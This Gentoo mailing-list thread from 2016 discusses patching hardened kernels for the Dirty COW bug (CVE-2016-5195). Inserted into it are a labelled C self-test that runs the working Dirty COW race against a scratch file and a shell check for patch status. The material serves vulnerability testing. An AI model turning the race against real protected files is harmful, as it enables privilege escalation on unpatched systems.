Mailing List Archive

Re: hardened-sources-4.4.8-r1 mad COW patched?
On 25/10/16 at 12:56, Miroslav Rovis wrote:
> Hi!
Hi Miroslav!
> Due to this bug:
> https://bugs.gentoo.org/show_bug.cgi?id=597554
>
> I can't use the patched 4.7.9 of hardened sources.
>
> hardened-sources-4.4.8-r1 do not appear to me to be mad COW patched.
I guess you are talking about CVE-2016-5195 here. Please correct me if
mistaken.
> I looked up the sources, but am not able to see for sure how to patch
> 4.4.8-r1 myself.
>
> I have just rsynced my system and nothing new seems to have happened
> with 4.4.8-r1 yet.
If 4.4.8 gets patched you will find a new revision (i.e. 4.4.8-r2). This
is quite standard Gentoo policy, if a package is modified after
publication (for example by backporting patches) the revision of the
package has to be increased so that users will be able to use these when
updating. The only exceptions I know of are the -9999 packages for
bleeding edge trunks and some very minor changes (think for example of a
fix in the build system or a minor documentation fix) which a fix for
CVE-2016-5195 clearly wouldn't be.

You can read more on the Gentoo project revision policy for ebuilds at
https://devmanual.gentoo.org/general-concepts/ebuild-revisions/
> Is there patching needed for those stable hardened sources and will
> there be a patch soon?
According to
https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
CVE-2016-5195 has been around since 2.6.22 so 4.4.8-r1 is not patched
and is needed to protect against this issue, as for whether or not there
will be a backported patch you should ask blueness but my guess is
that there won't be one unless somebody provides such a backported patch
to blueness.

I'm CCing the Gentoo Hardened user list as other users may be able to
provide more and better input on this.

Sincerely,
Francisco Blas Izquierdo Riera (klondike)
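The question in this message is whether a given kernel still carries CVE-2016-5195. Below is an added example, not code from this thread or from Gentoo: a bounded self-test in C that runs the Dirty COW race (madvise(MADV_DONTNEED) against writes through /proc/self/mem, the mechanism described in the vulnerability write-up linked above) against a scratch file the process creates itself, so nothing outside that file is touched. The file path, contents, iteration budget and function names are this example's own choices. A result of 1 means a write reached the read-only file (unpatched kernel); 0 means nothing landed within the budget, which is consistent with a patched kernel but is not a proof; -1 means the probe could not be set up (for example no write access to /proc/self/mem inside a container).

```c
/*
 * Bounded probe for CVE-2016-5195 ("Dirty COW").  Added example, not code
 * from the thread.  Two threads race on a PROT_READ, MAP_PRIVATE mapping of
 * a scratch file: one keeps discarding the private page (MADV_DONTNEED),
 * the other writes into the mapping through /proc/self/mem (FOLL_FORCE).
 * Patched kernel: the write lands in a private COW copy, file unchanged.
 * Unpatched kernel: the write hits the page-cache page, file changes.
 * Budget, path and contents are arbitrary choices of this example.
 */
#define _GNU_SOURCE
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

#define WRITE_ATTEMPTS 100000                 /* bounded budget for the race */
static const char ORIGINAL[] = "original-read-only-content";
static const char PAYLOAD[]  = "dirtycow";

struct probe {
    void *map;            /* read-only private mapping of the scratch file */
    size_t len;
    volatile int stop;    /* set by the writer thread when its budget is spent */
    int mem_ok;           /* /proc/self/mem could be opened read-write */
};

/* Thread 1: drop the private page so the next write has to fault it in again. */
static void *madvise_loop(void *arg)
{
    struct probe *p = arg;
    while (!p->stop)
        madvise(p->map, p->len, MADV_DONTNEED);
    return NULL;
}

/* Thread 2: forced writes into the read-only mapping via /proc/self/mem. */
static void *procmem_loop(void *arg)
{
    struct probe *p = arg;
    int fd = open("/proc/self/mem", O_RDWR);
    if (fd >= 0) {
        p->mem_ok = 1;
        for (int i = 0; i < WRITE_ATTEMPTS; i++) {
            if (lseek(fd, (off_t)(uintptr_t)p->map, SEEK_SET) < 0)
                break;
            (void)!write(fd, PAYLOAD, sizeof(PAYLOAD) - 1);
        }
        close(fd);
    }
    p->stop = 1;
    return NULL;
}

/* 1 = scratch file modified (vulnerable), 0 = unchanged within budget,
 * -1 = probe could not be set up (no /tmp, no threads, no /proc/self/mem). */
int dirtycow_probe(void)
{
    char path[] = "/tmp/dirtycow-probe-XXXXXX";   /* our own scratch file */
    int wfd = mkstemp(path);
    if (wfd < 0)
        return -1;
    if (write(wfd, ORIGINAL, sizeof(ORIGINAL)) != (ssize_t)sizeof(ORIGINAL)) {
        close(wfd); unlink(path); return -1;
    }
    fchmod(wfd, 0444);                            /* read-only, like a real target */
    close(wfd);

    int result = -1;
    int rfd = open(path, O_RDONLY);
    if (rfd < 0) { unlink(path); return -1; }

    struct probe p = { .len = sizeof(ORIGINAL), .stop = 0, .mem_ok = 0 };
    p.map = mmap(NULL, p.len, PROT_READ, MAP_PRIVATE, rfd, 0);
    if (p.map != MAP_FAILED) {
        pthread_t t_madv, t_mem;
        if (pthread_create(&t_madv, NULL, madvise_loop, &p) == 0) {
            if (pthread_create(&t_mem, NULL, procmem_loop, &p) == 0)
                pthread_join(t_mem, NULL);
            p.stop = 1;                           /* also releases t_madv on failure */
            pthread_join(t_madv, NULL);
        }
        if (p.mem_ok) {                           /* re-read the file from the fd */
            char buf[sizeof(ORIGINAL)];
            if (pread(rfd, buf, sizeof(buf), 0) == (ssize_t)sizeof(buf))
                result = memcmp(buf, ORIGINAL, sizeof(buf)) == 0 ? 0 : 1;
        }
        munmap(p.map, p.len);
    }
    close(rfd);
    unlink(path);
    return result;
}

const char *dirtycow_verdict(int r)
{
    if (r == 1) return "VULNERABLE: write through /proc/self/mem reached the read-only file";
    if (r == 0) return "not exploited within the budget (consistent with a patched kernel)";
    return "probe could not run (no /proc/self/mem write access, threads or /tmp)";
}

int main(void)
{
    int r = dirtycow_probe();
    printf("CVE-2016-5195 probe: %s\n", dirtycow_verdict(r));
    return r == 1 ? 2 : 0;
}
```

Build with `cc -pthread -O2 probe.c -o probe` and run it as an unprivileged user; it exits with status 2 when the race succeeded. Raise WRITE_ATTEMPTS if you want a longer run on a machine you suspect is unpatched; the published proof of concept loops far longer than this budget.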
Re: hardened-sources-4.4.8-r1 mad COW patched?
On 10/25/16 10:10 AM, Francisco Blas Izquierdo Riera (klondike) wrote:
> On 25/10/16 at 12:56, Miroslav Rovis wrote:
>> Hi!
> Hi Miroslav!
>> Due to this bug:
>> https://bugs.gentoo.org/show_bug.cgi?id=597554
>>
>> I can't use the patched 4.7.9 of hardened sources.
>>
>> hardened-sources-4.4.8-r1 do not appear to me to be mad COW patched.
> I guess you are talking about CVE-2016-5195 here. Please correct me if
> mistaken.
>> I looked up the sources, but am not able to see for sure how to patch
>> 4.4.8-r1 myself.
>>
>> I have just rsynced my system and nothing new seems to have happened
>> with 4.4.8-r1 yet.
> If 4.4.8 gets patched you will find a new revision (i.e. 4.4.8-r2). This
> is quite standard Gentoo policy, if a package is modified after
> publication (for example by backporting patches) the revision of the
> package has to be increased so that users will be able to use these when
> updating. The only exceptions I know of are the -9999 packages for
> bleeding edge trunks and some very minor changes (think for example of a
> fix in the build system or a minor documentation fix) which a fix for
> CVE-2016-5195 clearly wouldn't be.
>
> You can read more on the Gentoo project revision policy for ebuilds at
> https://devmanual.gentoo.org/general-concepts/ebuild-revisions/
>> Is there patching needed for those stable hardened sources and will
>> there be a patch soon?
> According to
> https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
> CVE-2016-5195 has been around since 2.6.22 so 4.4.8-r1 is not patched
> and is needed to protect against this issue, as for whether or not there
> will be a backported patch you should ask blueness but my guess is
> that there won't be one unless somebody provides such a backported patch
> to blueness.
>
> I'm CCing the Gentoo Hardened user list as other users may be able to
> provide more and better input on this.
>
> Sincerely,
> Francisco Blas Izquierdo Riera (klondike)
>

I'm testing 4.7.10 and will have it stabilized soon.

--
Anthony G. Basile, Ph.D.
Gentoo Linux Developer [Hardened]
E-Mail : blueness@gentoo.org
GnuPG FP : 1FED FAD9 D82C 52A5 3BAB DC79 9384 FA6E F52D 4BBA
GnuPG ID : F52D4BBA
Re: Re: hardened-sources-4.4.8-r1 mad COW patched?
On 10/25/2016 10:11 AM, Anthony G. Basile wrote:
>
> I'm testing 4.7.10 and will have it stabilized soon.
>

FWIW, I've been panic-updating all of our x86/amd64 servers (mostly HP
Proliant) to 4.7.10 and nothing has blown up yet.
Re: hardened-sources-4.4.8-r1 mad COW patched?
(the first message I sent to hardened@gentoo.org but I meant to send to
the list, so resending)
On 161025-10:11-0400, Anthony G. Basile wrote:
> On 10/25/16 10:10 AM, Francisco Blas Izquierdo Riera (klondike) wrote:
> > On 25/10/16 at 12:56, Miroslav Rovis wrote:
> >> Hi!
> > Hi Miroslav!
> >> Due to this bug:
> >> https://bugs.gentoo.org/show_bug.cgi?id=597554
> >>
> >> I can't use the patched 4.7.9 of hardened sources.
> >>
> >> hardened-sources-4.4.8-r1 do not appear to me to be mad COW patched.
> > I guess you are talking about CVE-2016-5195 here. Please correct me if
> > mistaken.
> >> I looked up the sources, but am not able to see for sure how to patch
> >> 4.4.8-r1 myself.
> >>
> >> I have just rsynced my system and nothing new seems to have happened
> >> with 4.4.8-r1 yet.
> > If 4.4.8 gets patched you will find a new revision (i.e. 4.4.8-r2). This
> > is quite standard Gentoo policy, if a package is modified after
> > publication (for example by backporting patches) the revision of the
> > package has to be increased so that users will be able to use these when
> > updating. The only exceptions I know of are the -9999 packages for
> > bleeding edge trunks and some very minor changes (think for example of a
> > fix in the build system or a minor documentation fix) which a fix for
> > CVE-2016-5195 clearly wouldn't be.
> >
> > You can read more on the Gentoo project revision policy for ebuilds at
> > https://devmanual.gentoo.org/general-concepts/ebuild-revisions/
> >> Is there patching needed for those stable hardened sources and will
> >> there be a patch soon?
> > According to
> > https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
> > CVE-2016-5195 has been around since 2.6.22 so 4.4.8-r1 is not patched
> > and is needed to protect against this issue, as for whether or not there
> > will be a backported patch you should ask blueness but my guess is
> > that there won't be one unless somebody provides such a backported patch
> > to blueness.
> >
> > I'm CCing the Gentoo Hardened user list as other users may be able to
> > provide more and better input on this.
> >
> > Sincerely,
> > Francisco Blas Izquierdo Riera (klondike)
> >
>
> I'm testing 4.7.10 and will have it stabilized soon.
>
> --
> Anthony G. Basile, Ph.D.
> Gentoo Linux Developer [Hardened]
> E-Mail : blueness@gentoo.org
> GnuPG FP : 1FED FAD9 D82C 52A5 3BAB DC79 9384 FA6E F52D 4BBA
> GnuPG ID : F52D4BBA

Professor Basile,

it's always a privilege reading from you, but do you mean the bug:
> >> https://bugs.gentoo.org/show_bug.cgi?id=597554
will be fixed too?

Regards!
--
Miroslav Rovis
Zagreb, Croatia
http://www.CroatiaFidelis.hr
Re: hardened-sources-4.4.8-r1 mad COW patched?
Hi Francisco, and Michael!

On 161025-16:10+0200, Francisco Blas Izquierdo Riera (klondike) wrote:
> On 25/10/16 at 12:56, Miroslav Rovis wrote:
> > Hi!
> Hi Miroslav!
> > Due to this bug:
> > https://bugs.gentoo.org/show_bug.cgi?id=597554
> >
> > I can't use the patched 4.7.9 of hardened sources.
> >
> > hardened-sources-4.4.8-r1 do not appear to me to be mad COW patched.
> I guess you are talking about CVE-2016-5195 here. Please correct me if
> mistaken.
Not likely. Prefer not to go checking it but mad [C]opy [O]n [W]rite has
acquired enough notoriety by now.
> > I looked up the sources, but am not able to see for sure how to patch
> > 4.4.8-r1 myself.
> >
> > I have just rsynced my system and nothing new seems to have happened
> > with 4.4.8-r1 yet.
> If 4.4.8 gets patched you will find a new revision (i.e. 4.4.8-r2).
> ...
I know that more or less well.
>
> You can read more on the Gentoo project revision policy for ebuilds at
> https://devmanual.gentoo.org/general-concepts/ebuild-revisions/
That awaits me. I went through it to some extent once, but I'm too slow
to figure out much so well very soon... I'm nearly 60 years old and started
with computing after I was 40...
>
> I'm CCing the Gentoo Hardened user list as other users may be able to
> provide more and better input on this.
Which is great, since I now subscribed.
>
> Sincerely,
> Francisco Blas Izquierdo Riera (klondike)
Thanks, Francisco!

The other correspondent in this thread, Michael Orlitzky, mentioned how
4.7.10 already works fine for him.

I'll paste and ask him here:

> > I'm testing 4.7.10 and will have it stabilized soon.
> >
>
> FWIW, I've been panic-updating all of our x86/amd64 servers (mostly HP
> Proliant) to 4.7.10 and nothing has blown up yet.

Michael,

are you talking about that bug:

=sys-kernel/hardened-sources-4.7.6: Kernel panic when starting KVM
guests
> > https://bugs.gentoo.org/show_bug.cgi?id=597554
having been fixed in 4.7.10

Where are the hardened-sources?
I tried:
https://gitweb.gentoo.org/proj/hardened-kernel.git/
and see only very old stuff there.
I tried:
https://gitweb.gentoo.org/dev/blueness.git/
but can't find how to (maybe) get 4.7.10.

(And I also couldn't find them on Github a few days ago. And also
currently don't have the time to study the Gentoo git system more deeply.)

Regards!
--
Miroslav Rovis
Zagreb, Croatia
http://www.CroatiaFidelis.hr
Re: hardened-sources-4.4.8-r1 mad COW patched?
On 161025-17:24+0200, Miroslav Rovis wrote:
> (the first message I sent to hardened@gentoo.org but I meant to send to
> the list, so resending)
Due to my above mess-up, blueness's reply didn't get to the list, but I'll
manually forward the reply that I got, further below.

> On 161025-10:11-0400, Anthony G. Basile wrote:
> > On 10/25/16 10:10 AM, Francisco Blas Izquierdo Riera (klondike) wrote:
> > > On 25/10/16 at 12:56, Miroslav Rovis wrote:
> > >> Hi!
> > > Hi Miroslav!
> > >> Due to this bug:
> > >> https://bugs.gentoo.org/show_bug.cgi?id=597554
> > >>
> > >> I can't use the patched 4.7.9 of hardened sources.
>
> Professor Basile,
>
> it's always a privilege reading from you, but do you mean the bug:
> > >> https://bugs.gentoo.org/show_bug.cgi?id=597554
> will be fixed too?

(blueness replied to me:)

I don't know, but even if the bug carries over, we still need to move
forward on this.
---
Thanks, Professor Basile!

And the need to move forward I, of course, understand. But 4.4.8-r1
has the mad COW, and the 4.7.10 will probably have that bug carried
over...

I spent almost two days testing for that bug, and should be off, and
will be off with other business... But I too use my machines daily, and
I don't have a reliable system now...

Oh well, it happens, what can you... Maybe I'll somehow survive ;-)

--
Miroslav Rovis
Zagreb, Croatia
http://www.CroatiaFidelis.hr
Re: Re: hardened-sources-4.4.8-r1 mad COW patched?
On Tuesday, 25.10.2016 at 18:24,
Miroslav Rovis <miro.rovis@croatiafidelis.hr> wrote:

> The other correspondent in this thread, Michael Orlitzky, mentioned
> how 4.7.10 already works fine for him.
>
> I'll paste and ask him here:
>
> > > I'm testing 4.7.10 and will have it stabilized soon.
> > >
> >
> > FWIW, I've been panic-updating all of our x86/amd64 servers (mostly
> > HP Proliant) to 4.7.10 and nothing has blown up yet.
>
> Michael,
>
> are you talking about that bug:
>
> =sys-kernel/hardened-sources-4.7.6: Kernel panic when starting KVM
> guests
> > > https://bugs.gentoo.org/show_bug.cgi?id=597554
> having been fixed in 4.7.10

Interesting. I'm using hardened-sources-4.7.6 and qemu-2.7.0-r4 and
don't have any problems so far. I'm using qemu VMs with xubuntu
14.04 and 16.04.

--
Regards
wabe
Re: Re: hardened-sources-4.4.8-r1 mad COW patched?
On 161025-19:35+0200, wabe wrote:
> On Tuesday, 25.10.2016 at 18:24,
> Miroslav Rovis <miro.rovis@croatiafidelis.hr> wrote:
>
> > The other correspondent in this thread, Michael Orlitzky, mentioned
> > how 4.7.10 already works fine for him.
> >
> > I'll paste and ask him here:
> >
> > > > I'm testing 4.7.10 and will have it stabilized soon.
> > > >
> > >
> > > FWIW, I've been panic-updating all of our x86/amd64 servers (mostly
> > > HP Proliant) to 4.7.10 and nothing has blown up yet.
> >
> > Michael,
> >
> > are you talking about that bug:
> >
> > =sys-kernel/hardened-sources-4.7.6: Kernel panic when starting KVM
> > guests
> > > > https://bugs.gentoo.org/show_bug.cgi?id=597554
> > having been fixed in 4.7.10
>
> Interesting. I'm using hardened-sources-4.7.6 and qemu-2.7.0-r4 and
> don't have any problems so far. I'm using qemu VMs with xubuntu
> 14.04 and 16.04.
You mean your hardened-sources-4.7.6 are set up as grsecurity-hardened?

Or are they maybe SELinux hardened? Or AppArmor hardened? Or other?
(really not familiar much with all the options in the hardened)

Regards!
--
Miroslav Rovis
Zagreb, Croatia
http://www.CroatiaFidelis.hr
Re: Re: hardened-sources-4.4.8-r1 mad COW patched?
On 25 Oct 2016 at 19:35, wabe wrote:

> Interesting. I'm using hardened-sources-4.7.6 and qemu-2.7.0-r4 and
> don't have any problems so far. I'm using qemu VMs with xubuntu
> 14.04 and 16.04.

do you enable SANITIZE? 'cos that's what seems to trigger the problem for Miroslav.
Re: Re: hardened-sources-4.4.8-r1 mad COW patched?
On Tuesday, 25.10.2016 at 20:17,
Miroslav Rovis <miro.rovis@croatiafidelis.hr> wrote:

> On 161025-19:35+0200, wabe wrote:
> > On Tuesday, 25.10.2016 at 18:24,
> > Miroslav Rovis <miro.rovis@croatiafidelis.hr> wrote:
> >
> > > The other correspondent in this thread, Michael Orlitzky,
> > > mentioned how 4.7.10 already works fine for him.
> > >
> > > I'll paste and ask him here:
> > >
> > > > > I'm testing 4.7.10 and will have it stabilized soon.
> > > > >
> > > >
> > > > FWIW, I've been panic-updating all of our x86/amd64 servers
> > > > (mostly HP Proliant) to 4.7.10 and nothing has blown up yet.
> > >
> > > Michael,
> > >
> > > are you talking about that bug:
> > >
> > > =sys-kernel/hardened-sources-4.7.6: Kernel panic when starting KVM
> > > guests
> > > > > https://bugs.gentoo.org/show_bug.cgi?id=597554
> > > having been fixed in 4.7.10
> >
> > Interesting. I'm using hardened-sources-4.7.6 and qemu-2.7.0-r4 and
> > don't have any problems so far. I'm using qemu VMs with xubuntu
> > 14.04 and 16.04.
> You mean your hardened-sources-4.7.6 are set up as
> grsecurity-hardened?
>
> Or are they maybe SELinux hardened? Or AppArmor hardened? Or other?
> (really not familiar much with all the options in the hardened)

I'm using grsecurity but I don't have PAX_MEMORY_SANITIZE enabled.
According to PaX Team's reply to my last message this is the reason why
I don't have problems with qemu.

--
Regards
wabe
Re: Re: hardened-sources-4.4.8-r1 mad COW patched?
On Tuesday, 25.10.2016 at 20:23,
"PaX Team" <pageexec@freemail.hu> wrote:

> On 25 Oct 2016 at 19:35, wabe wrote:
>
> > Interesting. I'm using hardened-sources-4.7.6 and qemu-2.7.0-r4 and
> > don't have any problems so far. I'm using qemu VMs with xubuntu
> > 14.04 and 16.04.
>
> do you enable SANITIZE? 'cos that's what seems to trigger the problem
> for Miroslav.

I don't have this feature enabled because of a possible performance
impact. My system is already slow enough. ;-)

Symbol: PAX_MEMORY_SANITIZE [=n]
Type : boolean
Prompt: Sanitize all freed memory
Location:
-> Security options
-> Grsecurity
-> Grsecurity (GRKERNSEC [=y])
-> Customize Configuration
-> PaX
-> Miscellaneous hardening features

--
Regards
wabe
Re: Re: hardened-sources-4.4.8-r1 mad COW patched?
( wabe I also read your reply )

On 161025-20:23+0200, PaX Team wrote:
> On 25 Oct 2016 at 19:35, wabe wrote:
>
> > Interesting. I'm using hardened-sources-4.7.6 and qemu-2.7.0-r4 and
> > don't have any problems so far. I'm using qemu VMs with xubuntu
> > 14.04 and 16.04.
>
> do you enable SANITIZE? 'cos that's what seems to trigger the problem for Miroslav.
>
Nope! Or not completely true.

https://bugs.gentoo.org/show_bug.cgi?id=597554#c56
where you find:

"which means, with SANITIZE: crash, w/o SANITIZE: no work..."

And also my recall in the next comment, the c57 of how previously even
the SANITIZE-disabled kernel crashed.

Wish I could dedicate more time to that testing now... Unfortunately,
no straight dedicated long enough time to work on that available here
for one or two more days...

Binary search should be in order...

And your reply in that bug, on how that different behavior of those
kernels comes about, would be great for non-experts... (the "ioctl(KVM_CREATE_VM)
failed: 12 Cannot allocate memory"... by the SANITIZE-disabled kernel...

Of course, if you can find that time... (esp. since I can not find much
time now for a while)...

Regards!
--
Miroslav Rovis
Zagreb, Croatia
http://www.CroatiaFidelis.hr
Re: Re: hardened-sources-4.4.8-r1 mad COW patched?
On 161025-19:06+0200, Miroslav Rovis wrote:
> On 161025-17:24+0200, Miroslav Rovis wrote:
...
> > > On 10/25/16 10:10 AM, Francisco Blas Izquierdo Riera (klondike) wrote:
> > > > On 25/10/16 at 12:56, Miroslav Rovis wrote:
...
>
> And the need to move forware I, of course, I understand. But 4.4.8-r1
> has the mad COW, and the 4.7.10 will probably have that bug carried
> over...
>
> I spent almost two days testing for that bug, and should be off, and
> will be off with other business... But I too use my machines daily, and
> I don't have a reliable system now...
...

The 4.4.8-r1 can be patched just like any other kernel!

Developer Fernando Rodriguez has been kind enough to tolerate my obstinate
misunderstanding of his tip, and taught me how to do it:

[gentoo-user] Dirty COW, 4.4.8-hardened-r1 how to fix?
https://archives.gentoo.org/gentoo-user/message/be9665d005ad02d1826610571d0c7d5d

So likely it is just that, now after patching it, I only need to:

# make && make install && make modules_install &

Regards!
--
Miroslav Rovis
Zagreb, Croatia
http://www.CroatiaFidelis.hr
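For the manual-patching route described in this last message, and for the earlier question of whether a given tree or running kernel is patched at all, here is an added example in POSIX sh (not from the thread, the linked gentoo-user message, or Gentoo itself). It relies on two facts about the upstream fix: mainline commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 ("mm: remove gup_flags FOLL_WRITE games from __get_user_pages()") introduced the FOLL_COW flag in include/linux/mm.h, and the stable releases that first shipped it were 4.4.26, 4.7.9 and 4.8.3. The function names, messages and the `--check` argument are this example's own. The version check only makes sense for upstream or Gentoo version numbering, since vendor kernels backport fixes without bumping the version; for those, the tree check or a runtime probe is the reliable answer.

```sh
#!/bin/sh
# Added example (not from the thread): is this source tree / running kernel
# patched for CVE-2016-5195, and how to apply a backport without leaving a
# half-patched tree behind.  Facts used: the upstream fix (mainline commit
# 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619) introduced FOLL_COW in
# include/linux/mm.h; stable first shipped it in 4.4.26, 4.7.9 and 4.8.3.
# Function names, paths and messages are this example's own choices.

# Source-tree check: a tree whose mm.h lacks FOLL_COW does not carry the fix.
tree_has_dirtycow_fix() {
    grep -q 'FOLL_COW' "$1/include/linux/mm.h" 2>/dev/null
}

# Version check for upstream/Gentoo numbering ("4.4.8-hardened-r1" -> 4.4.8).
# Returns 0 when the version is at or above the first fixed release of its
# series.  Not meaningful for vendor kernels that backport silently.
kernel_has_dirtycow_fix() {
    v=${1%%-*}                               # strip "-hardened-r1" and the like
    oldifs=$IFS; IFS=.; set -- $v; IFS=$oldifs
    maj=${1:-0}; min=${2:-0}; pat=${3:-0}
    [ "$maj" -gt 4 ] && return 0
    [ "$maj" -lt 4 ] && return 1             # 2.6.22 .. 3.x: only via distro backports
    case "$min" in
        4) [ "$pat" -ge 26 ] ;;
        7) [ "$pat" -ge 9 ] ;;
        8) [ "$pat" -ge 3 ] ;;
        *) [ "$min" -ge 9 ] ;;               # 4.0-4.3, 4.5, 4.6 were EOL and never fixed
    esac
}

# Apply a patch only if a dry run succeeds, so the tree is never left half-patched.
# A mainline commit may need fuzz or hand-editing on an older tree such as 4.4;
# the dry run tells you before anything is touched.
apply_patch_checked() {
    dir=$1; pf=$2
    patch -p1 -s -N --dry-run -d "$dir" < "$pf" || return 1
    patch -p1 -s -N -d "$dir" < "$pf"
}

# After patching /usr/src/linux, the usual rebuild with the existing .config is
#   make olddefconfig && make && make modules_install && make install
# followed by regenerating the bootloader configuration.

if [ "${1:-}" = "--check" ]; then
    running=$(uname -r)
    if kernel_has_dirtycow_fix "$running"; then
        echo "$running: at or above the first fixed release of its series"
    else
        echo "$running: version predates the fix (or is vendor-numbered; check the tree or probe at runtime)"
    fi
    if [ -d /usr/src/linux ]; then
        if tree_has_dirtycow_fix /usr/src/linux; then
            echo "/usr/src/linux: FOLL_COW present, tree carries the fix"
        else
            echo "/usr/src/linux: FOLL_COW missing, tree is unpatched"
        fi
    fi
fi
```

Run it as `sh dirtycow-check.sh --check`. To patch a tree by hand, save the upstream commit as a patch file, then `apply_patch_checked /usr/src/linux fix.patch` and confirm with `tree_has_dirtycow_fix /usr/src/linux` before rebuilding.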